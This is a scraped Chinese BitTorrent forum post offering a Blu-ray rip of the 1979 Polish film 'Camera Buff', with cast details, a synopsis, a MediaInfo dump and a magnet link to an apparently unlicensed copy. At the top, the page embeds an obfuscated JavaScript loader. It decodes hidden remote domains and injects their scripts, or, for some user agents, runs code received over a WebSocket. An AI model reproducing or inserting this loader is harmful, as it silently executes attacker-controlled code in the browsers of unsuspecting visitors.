影迷[简繁字幕]Camera.Buff.1979.BluRay.1080p.DTS-HD.MA.1.0.x265.10bit-迅雷下载 12.99GB

版主小s 26天前 153

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 影迷 / Camera Buff / 电影狂(台)

◎片 名 Amator

◎年 代 1979

◎产 地 波兰

◎类 别 剧情 / 喜剧 / 爱情

◎语 言 波兰语

◎上映日期 1979-08(莫斯科电影节) / 1979-11-16(波兰)

◎IMDb评分 7.9/10 from 6498 users

◎IMDb链接 https://www.imdb.com/title/tt0078763

◎豆瓣评分 8.4/10 from 3245 users

◎豆瓣链接 https://movie.douban.com/subject/1294303/

◎片 长 117分钟

◎导 演 克日什托夫·基耶斯洛夫斯基 Krzysztof Kieslowski

◎编 剧 克日什托夫·基耶斯洛夫斯基 Krzysztof Kieslowski / 耶日·斯图尔 Jerzy Stuhr

◎主 演 耶日·斯图尔 Jerzy Stuhr

莫格莎塔·札柯夫斯卡 Malgorzata Zabkowska

艾娃·珀卡斯 Ewa Pokas

斯特凡·希泽斯基 Stefan Czyzewski

耶日·诺瓦克 Jerzy Nowak

塔德乌什·布拉德茨基 Tadeusz Bradecki

马雷克·利特夫卡 Marek Litewka

博古斯瓦夫·索布丘克 Boguslaw Sobczuk

克日什托夫·扎努西 Krzysztof Zanussi

安杰伊·尤加 Andrzej Jurga

Alicja Bienicewicz

Wlodzimierz Maciudzinski

Roman Stankiewicz

Aleksandra Kisielewska

Tadeusz Rzepka

◎标 签 波兰 | 1979 | 剧情 | 文艺 | 摄影 | Krzysztof_Kieslowski | 喜剧 | 家庭

◎简 介

菲腊花了两个月的薪金买下八米厘摄影机,本想纪录刚出生女儿的成长,但厂长却要求他为单位服务,拍摄联欢晚会;误打误撞下,居然给他在电影节里捞了个奖。他登时雄心万丈立志成为纪录片大师,冷落娇妻也在所不计。但镜头下的真实却不是人人吃得消。当人民英雄的代价是好同事成了活靶,最後菲腊要在成名与道义之间作取舍。

  1. General

  2. Unique ID : 48641714031400127989193712911232192213 (0x24980DA8FF3AC25458B14F21151ACED5)

  3. Complete name : Camera.Buff.1979.BluRay.1080p.DTS-HD.MA.1.0.x265.10bit-BeiTai.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 13.0 GiB

  7. Duration : 1 h 53 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 16.4 Mb/s

  10. Encoded date : UTC 2021-07-06 05:32:09

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 53 min

  20. Bit rate : 15.3 Mb/s

  21. Width : 1 520 pixels

  22. Height : 1 080 pixels

  23. Display aspect ratio : 1.407

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.389

  30. Stream size : 12.1 GiB (93%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 15301 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1520x1080 / interlace=0 / total-frames=163145 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=19.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio

  42. ID : 2

  43. Format : DTS XLL

  44. Format/Info : Digital Theater Systems

  45. Commercial name : DTS-HD Master Audio

  46. Codec ID : A_DTS

  47. Duration : 1 h 53 min

  48. Bit rate mode : Variable

  49. Bit rate : 1 030 kb/s

  50. Channel(s) : 1 channel

  51. Channel layout : C

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossless

  56. Stream size : 835 MiB (6%)

  57. Title : Polish DTS-HD Master Audio 5.1 @ 1029 kbps

  58. Language : Polish

  59. Default : Yes

  60. Forced : No


  61. Text #1

  62. ID : 3

  63. Format : PGS

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 50 min

  67. Bit rate : 25.0 kb/s

  68. Count of elements : 2338

  69. Stream size : 19.8 MiB (0%)

  70. Title : Eng/SUP

  71. Language : English

  72. Default : No

  73. Forced : No


  74. Text #2

  75. ID : 4

  76. Format : PGS

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 1 h 50 min

  80. Bit rate : 18.7 kb/s

  81. Count of elements : 2402

  82. Stream size : 14.7 MiB (0%)

  83. Title : Chs/SUP 简体

  84. Language : Chinese

  85. Default : Yes

  86. Forced : No


  87. Text #3

  88. ID : 5

  89. Format : PGS

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 1 h 50 min

  93. Bit rate : 19.0 kb/s

  94. Count of elements : 2402

  95. Stream size : 15.0 MiB (0%)

  96. Title : Cht/SUP 繁体

  97. Language : Chinese

  98. Default : No

  99. Forced : No


  100. Menu

  101. 00:00:00.000 : en:第 01 章

  102. 00:09:06.087 : en:第 02 章

  103. 00:17:41.435 : en:第 03 章

  104. 00:27:01.578 : en:第 04 章

  105. 00:37:12.814 : en:第 05 章

  106. 00:47:17.835 : en:第 06 章

  107. 00:57:25.025 : en:第 07 章

  108. 01:06:01.082 : en:第 08 章

  109. 01:16:42.389 : en:第 09 章

  110. 01:26:19.841 : en:第 10 章

  111. 01:33:00.158 : en:第 11 章

  112. 01:43:07.181 : en:第 12 章


TAGS 剧情 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:AD8165DDCA7E5E47216D3B251960CD3A136E3FD3
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回